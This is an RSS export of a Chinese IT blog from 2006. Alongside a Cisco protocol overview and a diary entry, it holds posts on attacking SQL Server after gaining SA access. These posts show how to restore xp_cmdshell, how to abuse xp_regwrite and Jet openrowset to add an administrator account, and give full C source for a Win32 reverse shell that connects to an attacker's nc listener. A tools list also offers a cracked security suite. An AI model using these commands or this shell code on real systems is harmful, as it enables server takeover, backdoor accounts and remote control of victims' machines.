﻿<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:trackback="http://madskills.com/public/xml/rss/module/trackback/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/"><channel><title>IT博客-stone's blog</title><link>http://www.cnitblog.com/crazystone/</link><description>  

           

                                                                              以一种忽视来证明自己的存在......
  </description><language>zh-cn</language><lastBuildDate>Wed, 29 Apr 2026 05:58:57 GMT</lastBuildDate><pubDate>Wed, 29 Apr 2026 05:58:57 GMT</pubDate><ttl>60</ttl><item><title>CISCO协议总结大全 </title><link>http://www.cnitblog.com/crazystone/archive/2006/10/27/18506.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Fri, 27 Oct 2006 06:36:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/27/18506.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18506.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/27/18506.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18506.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18506.html</trackback:ping><description><![CDATA[
		<p>从网络、路由、数据链路、网络安全技术等4个方面对Cisco所使用的网络协议进行了分类和特点介绍。 
</p>
		<h2>
				<font size="2">1、思科网络路由协议 网络/路由（Network/Routing）</font>
		</h2>
		<ul>
				<li>CGMP：思科组管理协议 （CGMP：Cisco Group Management Protocol） 
</li>
				<li>EIGRP：增强的内部网关路由选择协议 （EIGRP：Enhanced Interior Gateway Routing Protocol） 
</li>
				<li>IGRP：内部网关路由协议 （IGRP：Interior Gateway Routing Protocol） 
</li>
				<li>HSRP：热备份路由器协议 （HSRP：Hot Standby Routing Protocol） 
</li>
				<li>RGMP：Cisco Router Port Group Management Protocol </li>
		</ul>
		<h3>
				<font size="2">CGMP：思科组管理协议 <br />CGMP：Cisco Group Management Protocol</font>
		</h3>
		<p>　　思科组管理协议 CGMP 主要用来限定只向与 IP 组播客户机相连的端口转发 IP 组播数据包。这些客户机自动加入和离开接收 IP 组播流量的组，交换机根据请求动态改变其转发行为。CGMP 主要提供以下服务： <br /><br />　　允许 IP 组播数据包被交换到具有 IP 组播客户机的那些端口。 <br />　　将网络带宽保存在用户字段，不致于转播不必要的IP组播流量。 <br />　　不需要改变终端主机系统。 <br />　　在为交换网络中的每个组播组创建独立 VLAN 时不会产生额外开销。 </p>
		<p>　　一旦 CGMP 被激活使用，它能自动识别与 CGMP-Capable 路由器连接的端口。CGMP 通过缺省方式被激活，它支持最大为64的 IP 组播组注册。支持 CGMP 的组播路由器周期性地相发送 CGMP 加入信息（Join Messages），用来通告自己执行网络交换行为。接收交换机保存信息，并设置一个类似于路由器保持时间（Holdtime）的定时器（Timer）。交换机每接收一个 CGMP 加入信息，定时器也随其不断更新。当路由器保持时间终止时，交换机负责将所有知道的组播组移出 CGMP。 </p>
		<p>　　CGMP 结合 IGMP 信息共同实现动态分配 Cisco Catalyst 交换机端口过程，从而 IP 组播流量只被转发给与 IP 组播客户机相连的那些端口。由于 CGMP-Capable IP 组播路由器看到所有 IGMP 数据包，因此它可以通知交换机特定主机什么时候加入或离开 IP 组播组。当 CGMP-Capable 路由器接收一个 IGMP 控制数据包时，它会创建一个包含请求类型（加入或离开）、组播组地址和主机有效 MAC 地址等的 CGMP 数据包。然后路由器将 CGMP 数据包发送到所有 Catalyst 交换机都知道的地址上。当交换机接收 CGMP 数据包时，交换机负责转换数据包同时更改组播组的转发行为。至此，该组播流量只被发送到与适当 IP 组播客户机相连的那些端口。该过程是自动实现的，无需用户参与。 </p>
		<h3>
				<font size="2">EIGRP：增强的内部网关路由选择协议<br />EIGRP：Enhanced Interior Gateway Routing Protocol</font>
		</h3>
		<p>　　增强的内部网关路由选择协议 EIGRP 是增强版的 IGRP 协议。IGRP 是思科提供的一种用于 TCP/IP 和 OSI 英特网服务的内部网关路由选择协议。它被视为是一种内部网关协议，而作为域内路由选择的一种外部网关协议，它还没有得到普遍应用。 <br /><br />　　Enhanced IGRP 与其它路由选择协议之间主要区别包括：收敛宽速（Fast Convergence）、支持变长子网掩模（Subnet Mask）、局部更新和多网络层协议。执行 Enhanced IGRP 的路由器存储了所有其相邻路由表，以便于它能快速利用各种选择路径（Alternate Routes）。如果没有合适路径，Enhanced IGRP 查询其邻居以获取所需路径。直到找到合适路径，Enhanced IGRP 查询才会终止，否则一直持续下去。 <br /><br />　　EIGRP 协议对所有的 EIGRP 路由进行任意掩码长度的路由聚合，从而减少路由信息传输，节省带宽。另外 EIGRP 协议可以通过配置，在任意接口的位边界路由器上支持路由聚合。 <br /><br />　　Enhanced IGRP 不作周期性更新。取而代之，当路径度量标准改变时，Enhanced IGRP 只发送局部更新（Partial Updates）信息。局部更新信息的传输自动受到限制，从而使得只有那些需要信息的路由器才会更新。基于以上这两种性能，因此 Enhanced IGRP 损耗的带宽比 IGRP 少得多。 </p>
		<h3>
				<font size="2">IGRP：内部网关路由协议<br />IGRP：Interior Gateway Routing Protocol</font>
		</h3>
		<p>　　内部网关路由协议（IGRP）是一种在自治系统（AS：autonomous system）中提供路由选择功能的路由协议。在上世纪80年代中期，最常用的内部路由协是路由信息协议（RIP）。尽管 RIP 对于实现小型或中型同机种互联网络的路由选择是非常有用的，但是随着网络的不断发展，其受到的限制也越加明显。思科路由器的实用性和 IGRP 的强大功能性，使得众多小型互联网络组织采用 IGRP 取代了 RIP。早在上世纪90年代，思科就推出了增强的 IGRP，进一步提高了 IGRP 的操作效率。 <br /><br />　　IGRP 是一种距离向量（Distance Vector）内部网关协议（IGP）。距离向量路由选择协议采用数学上的距离标准计算路径大小，该标准就是距离向量。距离向量路由选择协议通常与链路状态路由选择协议（Link-State Routing Protocols）相对，这主要在于：距离向量路由选择协议是对互联网中的所有节点发送本地连接信息。 <br /><br />　　为具有更大的灵活性，IGRP 支持多路径路由选择服务。在循环（Round Robin）方式下，两条同等带宽线路能运行单通信流，如果其中一根线路传输失败，系统会自动切换到另一根线路上。多路径可以是具有不同标准但仍然奏效的多路径线路。例如，一条线路比另一条线路优先3倍（即标准低3级），那么意味着这条路径可以使用3次。只有符合某特定最佳路径范围或在差量范围之内的路径才可以用作多路径。差量（Variance）是网络管理员可以设定的另一个值。 </p>
		<h3>
				<font size="2">HSRP：热备份路由器协议<br />HSRP：Hot Standby Router Protocol</font>
		</h3>
		<p>　　热备份路由器协议（HSRP）的设计目标是支持特定情况下 IP 流量失败转移不会引起混乱、并允许主机使用单路由器，以及即使在实际第一跳路由器使用失败的情形下仍能维护路由器间的连通性。换句话说，当源主机不能动态知道第一跳路由器的 IP 地址时，HSRP 协议能够保护第一跳路由器不出故障。该协议中含有多种路由器，对应一个虚拟路由器。HSRP 协议只支持一个路由器代表虚拟路由器实现数据包转发过程。终端主机将它们各自的数据包转发到该虚拟路由器上。 <br /><br />　　负责转发数据包的路由器称之为主动路由器（Active Router）。一旦主动路由器出现故障，HSRP 将激活备份路由器（Standby Routers）取代主动路由器。HSRP 协议提供了一种决定使用主动路由器还是备份路由器的机制，并指定一个虚拟的 IP 地址作为网络系统的缺省网关地址。如果主动路由器出现故障，备份路由器（Standby Routers）承接主动路由器的所有任务，并且不会导致主机连通中断现象。 <br /><br />　　HSRP 运行在 UDP 上，采用端口号1985。路由器转发协议数据包的源地址使用的是实际 IP 地址，而并非虚拟地址，正是基于这一点，HSRP 路由器间能相互识别。</p>
		<h3>
				<font size="2">RGMP：思科路由器端口组管理协议<br />RGMP：Cisco Router Port Group Management Protocol</font>
		</h3>
		<p>　　思科路由器端口组管理协议（RGMP）弥补了 Internet 组管理协议（IGMP：Internet Group Management Protocol）在 Snooping 技术机制上所存在的不足。RGMP 协议作用于组播路由器和交换机之间。通过 RGMP，可以将交换机中转发的组播数据包固定在所需要的路由器中。RGMP 的设计目标是应用于具有多种路由器相连的骨干交换网（Backbone Switched Networks）。 <br /><br />　　IGMP Snooping 技术的局限性主要体现在：该技术只能将组播流量固定在接收机间经过其它交换机直接或间接相连的交换端口，在 IGMP Snooping 技术下，组播流量不能固定在至少与一台组播路由器相连的端口处，从而引起这些端口的组播流量扩散。IGMP Snooping 是机制固有的局限性。基于此，路由器无法报告流量状态，所以交换机只能知道主机请求的组播流量类型，而不知道路由器端口接收的流量类型。 <br /><br />　　RGMP 协议支持将组播流量固定在路由器端口。为高效实现流量固定，要求网络交换机和路由器都必须支持 RGMP 。通过 RGMP，骨干交换机可以知道每个端口需要的组类型，然后组播路由器将该信息传送给交换机。但是路由器只发送 RGMP 信息，而忽视了所接收的 RGMP 信息。当组不再需要接收通信流量时，路由器会发送一个 RGMP 离开信息（Leave Message）。RGMP 协议中网络交换机需要消耗网络端口达到 RGMP 信息并对其进行处理操作。此外，RGMP 中的交换机不允许将接收到的 RGMP 信息转发/扩散到其它网络端口。 <br /><br />　　RGMP 的设计目标是与支持分配树 Join/Prune 的组播路由选择协议相结合使用。其典型协议为 PIM-SM。RGMP 协议只规定了 IP v4 组播路由选择操作，而不包括 IP v6。 </p>
		<h2>
				<font size="2">2、思科数据链路协议 数据链路 （Data Link）</font>
		</h2>
		<ul>
				<li>CDP：思科发现协议 （CDP：Cisco Discovery Protocol） 
</li>
				<li>DTP：思科动态中继协议 （DTP：Dynamic Trunk Protocol） 
</li>
				<li>ISL &amp; DISL：思科交换链路内协议和动态 ISL 协议 （ISL：Inter-Switch Link Protocol） 
</li>
				<li>VTP：思科VLAN中继协议 （VTP：VLAN Trunking Protocol） </li>
		</ul>
		<h3>
				<font size="2">CDP：思科发现协议 CDP <br />CDP：Cisco Discovery Protocol</font>
		</h3>
		<p>　　CDP基本上是用来获取相邻设备的协议地址以及发现这些设备的平台。CDP 也可为路由器的使用提供相关接口信息。CDP 是一种独立媒体协议，运行在所有思科本身制造的设备上，包括路由器、网桥、接入服务器和交换机。<br /><br />　　SNMP 中结合使用 CDP 管理信息基础 MIB，能使网络管理应用获知设备类型和相邻设备的 SNMP 代理地址，并向这些设备发送 SNMP 查询请求。Cisco 发现协议支持 CISCO-CDP-MIB。<br /><br />　　CDP 运行在所有的媒体上，从而支持子网访问协议 SNAP，包括局域网、帧中继和异步传输模式 ATM 物理媒体。CDP 只运行于数据链路层，因此，支持不同网络层协议的两个系统彼此相互了解。<br /><br />　　CDP 配置的每台设备发送周期性信息，如我们所知的广告到组播地址。每台设备至少广告一个地址，在该地址下，它可以接收 SNMP 信息。广告包括生存期，或保持时间等信息，这些信息指出了在取消之前接收设备应该保持 CDP 信息的时间长短。此外每台设备还要注意其它设备发出的周期性 CDP 信息，从中了解相邻设备信息并决定那些设备的媒体接口什么时候增长或降低。<br /><br />　　CDP 版本2，是目前该协议使用最普遍的版本，它具有更高的智能设备跟踪等性能。支持该性能的报告机制，提供快速差错跟踪功能，有利于缩短停机时间（Downtime）。报告差错信息可以发送到控制台或日志服务器（Logging Server），这些差错信息包括连接端口上不匹配（Unmatching）的本地??VLAN IDs（IEEE 802.1Q）以及连接设备间不匹配的端口双向状态。</p>
		<h3>
				<font size="2">DTP：思科动态中继协议<br />DTP：Cisco Dynamic Trunking Protocol</font>
		</h3>
		<p>　　思科动态中继协议 DTP，是 VLAN 组中思科所有协议，主要用于协商两台设备间链路上的中继过程以及中继封装 802.1Q 类型。<br /><br />　　中继协议有很多不同类型。如果端口被设置为 Trunk 端口，那么该端口便具有自动中继功能，在某些情况下，甚至具有协商端口中继类型的功能。这种与其它设备之间进行的协商中继方法的过程被称之为动态中继技术。<br /><br />　　首先关注的是，中继电缆（Trunk Cable）终端最好对它们正在中继或它们将中继帧视为正常帧问题达成一致。在信息帧头另外添加标签信息容易导致终端站的混乱，这是因为终端站的驱动栈无法识别该标签信息，从而导致终端系统上锁或失败。为解决这个问题，思科创建了交换协议以实现通信目的。推出的第一版本是 VTP，即 VLAN 中继协议，它与 ISL 共同作用。最新推出的版本，即动态中继协议 DTP 与 802.1Q 共同作用。<br /><br />　　其次是创建 LANs。交换机要想实现独立配置 VLANs 交换，需要做很多工作并且容易引起较多矛盾，这是因为 VLAN 100 运行在一台交换机上，计费却在另一台上。这很容易破坏机器的 VLAN 安全模式，而故障恢复机制正是为此而设立的。此外也可通过 VTP/DTP 解决该问题。同一管理控制台可以在某台交换机上创建或删除一个 VTP，并使信息自动传播到交换机组上，这种交换机组可能是一个 VTP 域。</p>
		<h3>
				<font size="2">ISL &amp; DISL：思科交换链路内协议和动态 ISL 协议<br />ISL &amp; DISL：Cisco Inter-Switch Link Protocol and Dynamic ISL Protocol</font>
		</h3>
		<p>　　交换链路内协议（ISL），是思科私有协议，主要用于维护交换机和路由器间的通信流量等 VLAN 信息。<br /><br />　　ISL 标签（Tagging）能与 802.1Q 干线执行相同任务，只是所采用的帧格式不同。ISL 干线（Trunks）是 Cisco 私有，即指两设备间（如交换机）的一条点对点连接线路。在“交换链路内协议”名称中即包含了这层含义。ISL 帧标签采用一种低延迟（Low-Latency）机制为单个物理路径上的多 VLANs 流量提供复用技术。ISL 主要用于实现交换机、路由器以及各节点（如服务器所使用的网络接口卡）之间的连接操作。为支持 ISL 功能特征，每台连接设备都必须采用 ISL 配置。ISL 所配置的路由器支持 VLAN 内通信服务。非 ISL 配置的设备，则用于接收由 ISL 封装的以太帧（Ethernet Frames），通常情况下，非 ISL 配置的设备将这些接收的帧及其大小归因于协议差错。<br /><br />　　和 802.1Q 一样，ISL 作用于 OSI 模型第2层。所不同的是，ISL 协议头和协议尾封装了整个第2层的以太帧。正因为此，ISL 被认为是一种能在交换机间传送第2层任何类型的帧或上层协议的独立协议。ISL 所封装的帧可以是令牌环（Token Ring）或快速以太网（Fast Ethernet），它们在发送端和接收端之间维持不变地实现传送。ISL 具有以下特征：<br /><br />　　由专用集成电路执行（ASIC：application-specific integrated circuits） <br />　　不干涉客户机站；客户机不会看到 ISL 协议头 <br />ISL NICs 为交换机与交换机、路由器与交换机、交换机与服务器等之间的运行提供高效性能。 <br />动态交换链路内协议（DISL），也属于思科协议。它简化了两台相互连接的快速以太网设备上 ISL 干线的创建过程。快速以太信道技术为高性能中枢连接提供了两个全双工快速以太网链路是集中性。由于 DISL 中只允许将一个链路终端配置为干线，所以 DISL 实现了最小化 VLAN 干线。 </p>
		<h3>
				<font size="2">VTP：思科VLAN中继协议<br />VTP：Cisco VLAN Trunking Protocol</font>
		</h3>
		<p>　　VLAN 中继协议（VTP）是思科第2层信息传送协议，主要控制网络范围内 VLANs 的添加、删除和重命名。VTP 减少了交换网络中的管理事务。当用户要为 VTP 服务器配置新 VLAN 时，可以通过域内所有交换机分配 VLAN，这样可以避免到处配置相同的 VLAN。VTP 是思科私有协议，它支持大多数的 Cisco Catalyst 系列产品。<br /><br />　　通过 VTP，其域内的所有交换机都清楚所有的 VLANs 情况，但当 VTP 可以建立多余流量时情况例外。这时，所有未知的单播（Unicasts）和广播在整个 VLAN 内进行扩散，使得网络中的所有交换机接收到所有广播，即使 VLAN 中没有连接用户，情况也不例外。而 VTP Pruning 技术正可以消除该多余流量。<br /><br />　　缺省方式下，所有Cisco Catalyst交换机都被配置为 VTP 服务器。这种情形适用于 VLAN 信息量小且易存储于任意交换机（NVRAM）上的小型网络。对于大型网络，由于每台交换机都会进行 NVRAM 存储操作，但该操作对于某些点是多余的，所以在这些点必须设置一个“判决呼叫”（Judgment Call）。基于此，网络管理员所使用的 VTP 服务器应该采用配置较好的交换机，其它交换机则作为客户机使用。此外需要有某些 VTP 服务器能提供网络所需的一定量的冗余。<br /><br />　　到目前为止，VTP 具有三种版本。其中 VTP v2 与 VTP v1 区别不大，主要不同在于：VTP v2 支持令牌环 VLANs，而 VTP v1 不支持。通常只有在使用 Token Ring VLANs 时，才会使用到 VTP v2，否则一般情况下并不使用 VTP v2。<br /><br />　　VTPv3 不能直接处理 VLANs 事务，它只负责管理域（Administrative Domain）内不透明数据库的分配任务。与前两版相比，VTP v3 具有以下改进：<br /><br />支持扩展 VLANs。 <br />支持专用 VLANs 的创建和广告。 <br />提供服务器认证性能。 <br />避免“错误”数据库进入 VTP 域。 <br />与 VTP v1 和 VTP v2 交互作用。 <br />支持每端口（On a Per-Port Basis）配置。 <br />支持传播VLAN数据库和其它数据库类型。</p>
		<h2>
				<font size="2">3、思科网络安全技术协议 网络安全技术 （Security/VPN）</font>
		</h2>
		<ul>
				<li>L2F：第二层转发协议 （Layer 2 Forwarding Protocol） 
</li>
				<li>TACACS：终端访问控制器访问控制系统 （TACACS：Terminal Access Controller Access Control System） </li>
		</ul>
		<h2>
				<font size="2">L2F：第二层转发协议<br />L2F: Level 2 Forwarding protocol</font>
		</h2>
		<p>　　第二层转发协议（L2F）是一种用来建立跨越公用结构组织（如因特网）的安全隧道，为企业家庭通路连接一个 ISP POP 的协议。这个隧道建立了一个用户与企业客户网路间的虚拟点对点连接。 </p>
		<p>　　第二层转发协议（L2F）允许链路层协议隧道技术。使用这样的隧道，使得分离原始拨号服务器位置即拨号协议连接终止的位置与提供的网络访问的位置成为可能。 <br /><br />　　L2F 允许在 L2F 中封装 PPP/SLIP 包。ISP NAS 与家庭通路都需要请求一种常规封装协议，所以可以成功地传输或接收 SLIP/PPP 包。 <br /><br />相关链接 GRE、PPP、L2TP、PPTP、SLIP <br />组织来源 L2F 由 Cisco 定义。 <br />相关链接 http://www.javvin.com/protocol/rfc2341.pdf：<br />Cisco Layer Two Forwarding （Protocol） — “L2F” </p>
		<h3>
				<font size="2">TACACS：终端访问控制器访问控制系统<br />TACACS &amp; TACACS+：Terminal Access Controller Access Control System</font>
		</h3>
		<p>　　终端访问控制器访问控制系统（TACACS）通过一个或多个中心服务器为路由器、网络访问控制器以及其它网络处理设备提供了访问控制服务。TACACS 支持独立的认证（Authentication）、授权（Authorization）和计费（Accounting）功能。 <br /><br />　　TACACS 允许客户机拥有自己的用户名和口令，并发送查询指令到 TACACS 认证服务器（又称之为TACACS Daemon 或 TACACSD）。通常情况下，该服务器运行在主机程序上。主机返回一个关于接收/拒绝请求的响应，然后根据响应类型，判断 TIP 是否允许访问。在上述过程中，判断处理采取“公开化（Opened Up）”并且对应的算法和数据取决于 TACACS Daemon 运行的对象。此外 TACACS 扩展协议支持更多类型的认证请求和响应代码。 <br /><br />　　当前 TACACS 具有三种版本，其中第三版 TACACS+ 与前两版不兼容。 </p>
		<h2>
				<font size="2">4 思科其他协议 </font>
		</h2>
		<h3>
				<font size="2">SCCP：信令连接控制协议<br />SCCP：Skinny Client Control Protocol</font>
		</h3>
		<p>　　信令连接控制协议 SCCP 是用于思科呼叫管理及其 VOIP 电话之间的思科专有协议。其他供应商也支持该协议。 <br /><br />　　为解决 VOIP 问题，要求 LAN 或者基于 IP 的 PBX 的终点站操作简单，常见且相对便宜。相对于 H.323 推荐的相当昂贵的系统而言，SCCP 定义了一个简单且易于使用的结构。通过 SCCP，H.323 代理可以与 Skinny 客户机进行通信。在这样的情况下，电话充当了 IP 上的 Skinny 客户机。而代理服务主要用于 H.225 和 H.245 信令。 </p>
		<p>　　关于 SCCP 结构，作为 Cisco 呼叫管理的 H.323 代理服务器中存在大量的 H.323 处理源。终点站（电话）运行的客户机，该客户机只需消耗少量处理开销，客户机通过面向连接（基于 TCP/IP）的通信方式实现呼叫管理间的通信过程，从而与另一个适应的 H.323 终点站建立一个呼叫连接。一旦这样的呼叫连接建立起来，那么两个 H.323 终点站就可以通过无连接（基于 UDP/IP）通信方式实现音频传输。这样，通过限制建立呼叫管理的 H.323 呼叫装备的复杂性、以及为实际音频通信出入终点站提供 Skinny 协议来降低整个过程的费用和开销。 <br />　　XOT：基于 TCP 协议的 Cisco X.25（XOT：X.25 over TCP Protocol by Cisco） <br /><br />　　基于 TCP 协议的 Cisco X.25（XOT）是由思科开发的一种用于在 IP 英特网上实现 X.25 传输的协议。X.25 数据包层通常采用 LAPB，并且要求在其本身下面包含一个可靠的链路层。XOT 提供了一种在 IP 英特网上发送 X.25 数据包的方法，即将 X.25 数据包层封装在 TCP 数据包中。<br /><br />　　TCP 具有一个可靠字节流。X.25 中要求其下面的层，特别是数据包间的边界包含信息语义。为了达到这个目标，要求 TCP 和 X.25 间的 XOT 协议头较小（大约4字节）。XOT 协议头包含一个长字段，用以分隔 TCP 流中的 X.25 数据包。 <br /><br />　　标准 X.25 协议数据包格式和状态转换规则通常应用于 XOT 中的 X.25 层。应注意例外情形。</p>
<img src ="http://www.cnitblog.com/crazystone/aggbug/18506.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-27 14:36 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/27/18506.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>SQL Server SA权限总结经典技术 </title><link>http://www.cnitblog.com/crazystone/archive/2006/10/24/18364.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Tue, 24 Oct 2006 15:11:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/24/18364.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18364.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/24/18364.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18364.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18364.html</trackback:ping><description><![CDATA[
		<span id="ArticleContent1_ArticleContent1_lblContent">前提需要工具：SQL Query Analyzer和SqlExec Sunx Version<br />　　<br />　　第一部分：<br />　　<br />　　有关去掉xp_cmdshell来保护系统的分析总结：<br />　　首先知道一下语句：<br />　　1.去掉xp_cmdshell扩展过程的方法是使用如下语句：<br />　　if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'<br />　　2.添加xp_cmdshell扩展过程的方法是使用如下语句：<br />　　sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'<br />　　现在看看现象：<br />　　我们在取得SA权限后远程用Sqlexec执行cmd命令，出现提示SQL_ERROR，那么很可能是去掉了xp_cmdshell。<br />　　<br />　　现在来看看被去掉xp_cmdshell后恢复的两种方法：<br />　　<br />　　方法一、使用SQL Query Analyzer连接对方后直接写入，挺方便sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'方法二、使用SqlExec Sunx Version首先在SqlExec Sunx Version的Format选项里填上%s，在CMD选项里输入sp_addextendedproc 'xp_cmdshell','xpsql70.dll'或者对Sql2000情况下使用sp_addextendedproc 'xp_cmdshell','xplog70.dll'另外使用SqlExec Sunx Version来去除xp_cmdshell的方法和加的时候选择条件一样，然后输入sp_dropextendedproc 'xp_cmdshell'就可以了<br />　　<br />　　第二部分：<br />　　<br />　　假如对方已经把xplog70.dll删除或者改了名，我们来用下面的方法继续我们的hack任务：<br />　　<br />　　当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。<br />　　<br />　　在查询分析器中写入sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'提示数据库中已存在名为'xp_cmdshell'的对象。</span>
		<br />
<img src ="http://www.cnitblog.com/crazystone/aggbug/18364.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-24 23:11 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/24/18364.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>SA权限仅需xp_regwrite即可有dos shell (转) </title><link>http://www.cnitblog.com/crazystone/archive/2006/10/24/18326.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Tue, 24 Oct 2006 04:06:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/24/18326.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18326.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/24/18326.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18326.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18326.html</trackback:ping><description><![CDATA[
		<span id="zoom"> 
<p>删除xp_cmdshell和xplog70.dll不用担心，只要保留xp_regwrite就可以执行系统命令，拥有一个dos shell<br />利用RDS的一个老问题，在IIS 4.0的时候被广泛利用，现在好像没多少人想得起来了<br />绝对比去想办法恢复xp_cmdshell来得经济实惠，不过需要猜一下系统路径<br />nt/2k: x:\winnt\system32\<br />xp/2003: x:\windows\system32\<br />如果有回显，可以看到执行返回结果，否则需要先判断主机OS类型再试<br />当然如果野蛮一点，四个轮流来一遍也行。</p><p>首先开启沙盘模式：<br />exec master..xp_regwrite 'HKEY_LOCAL_MACHINE''SOFTWARE\Microsoft\Jet\4.0\Engines''SandBoxMode''REG_DWORD'1</p><p>然后利用jet.oledb执行系统命令<br />select * from openrowset('microsoft.jet.oledb.4.0'';database=c:\winnt\system32\ias\ias.mdb''select shell("cmd.exe /c net user admin admin1234 /add")')</p><p>附：<br />无法连接数据库服务器时（数据库一般不对外开放，但是可以对外访问），<br />可以使用反弹dos shell方式搞定<br />====================== CUT here =======================<br />//name : win32 connect back shell source for nt/2K/xp/2003<br />//compile : cl win32cbsh.c (vc6)<br />//usage : <br />//on your pc : nc -l -p { listen port }<br />//on vitim pc : win32cbsh { your ip } { listen port }<br />//warning : if there's no parameter specified it will cause "fatal error"<br />#include <br />#pragma comment(lib"ws2_32")<br />int main(int argc char **argv)<br />{ <br />WSADATA wsaData;<br />SOCKET hSocket;<br />STARTUPINFO si;<br />PROCESS_INFORMATION pi;<br />struct sockaddr_in adik_sin;<br />memset(&amp;adik_sin0sizeof(adik_sin));<br />memset(&amp;si0sizeof(si));<br />WSAStartup(MAKEWORD(20)&amp;wsaData);<br />hSocket=WSASocket(AF_INETSOCK_STREAMNULLNULLNULLNULL);<br />adik_sin.sin_family=AF_INET;<br />adik_sin.sin_port=htons(atoi(argv[2]));<br />adik_sin.sin_addr.s_addr=inet_addr(argv[1]);<br />if(0!=connect(hSocket(struct sockaddr*)&amp;adik_sinsizeof(adik_sin))) return -1;<br />si.cb=sizeof(si);<br />si.dwFlags=STARTF_USESTDHANDLES;<br />si.hStdInput=si.hStdOutput=si.hStdError=(void *)hSocket;<br />createProcess(NULL"cmd.exe"NULLNULL1NULLNULLNULL&amp;si&amp;pi);<br />return 0;<br />}</p></span>
<img src ="http://www.cnitblog.com/crazystone/aggbug/18326.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-24 12:06 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/24/18326.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>欺骗?.快乐...?</title><link>http://www.cnitblog.com/crazystone/archive/2006/10/22/18249.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Sat, 21 Oct 2006 23:15:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/22/18249.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18249.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/22/18249.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18249.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18249.html</trackback:ping><description><![CDATA[
		<p>                                    我不知道这样下去对我来说将会是什么....<br /> <br />      那些欺骗别人的话,到现在才发现是自己一直欺骗自己<br /> </p>
		<p>  <br />做自己的決定做自己認為對的事凡事想清楚  </p>
		<p>                               </p>
		<p>                                                                               很多事 很難有第2次就算有   也會吃到苦頭....我想...<br /> </p>
		<p> </p>
		<p>我也想....我更想.... 慢慢來  不要急  慢慢去實現它.......</p>
<img src ="http://www.cnitblog.com/crazystone/aggbug/18249.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-22 07:15 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/22/18249.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>木马专杀</title><link>http://www.cnitblog.com/crazystone/archive/2006/10/20/18175.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Thu, 19 Oct 2006 22:57:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/20/18175.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18175.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/20/18175.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18175.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18175.html</trackback:ping><description><![CDATA[一、木马专杀如下： <br />1.Ewido Security Suite 3.5 绿色免安装中文破解版 病毒库0614 <br />软件简介： Ewido Security Suite Plus 是一款网络安全防护软件，在电脑上已经安装的其它安全软件基础上，补充为一个完整的安全系统。plus版本能实时监测整个系统运行，监测内存，内核自保护，在线升级等。程序可识别并清除160000种不同的黑客程序,木马程序,蠕虫程序,Dialers程序等! 全面保护你的网络安全! <br />注意:每次升级后导入压缩包里的ewido.reg注册表就好啦！ <br />离线升级包地址: http://www.ewido.net/en/download/updates/ <br />http://down.safechina.net/zhuansha/1.rar <br 